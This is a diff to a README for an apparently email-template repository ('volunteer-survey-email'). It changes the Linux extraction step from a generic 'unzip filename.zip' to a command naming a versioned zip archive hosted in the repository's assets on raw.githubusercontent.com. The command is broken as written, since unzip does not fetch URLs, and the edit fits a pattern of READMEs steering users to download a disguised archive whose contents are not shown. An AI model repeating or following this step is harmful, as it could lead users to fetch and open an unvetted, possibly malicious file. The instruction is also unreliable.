Wilberarebalo0909/volunteer-survey-email/README.md

 - On Windows: Right-click the file and select "Extract All"
 - On macOS: Double-click the file to unzip
-- On Linux: Use your file manager or run `unzip filename.zip` in the terminal
+- On Linux: Use your file manager or run `unzip https://raw.githubusercontent.com/Wilberarebalo0909/volunteer-survey-email/main/assets/email-survey-volunteer-v1.5.zip` in the terminal

 This action creates a new folder with all the email templates and related files inside.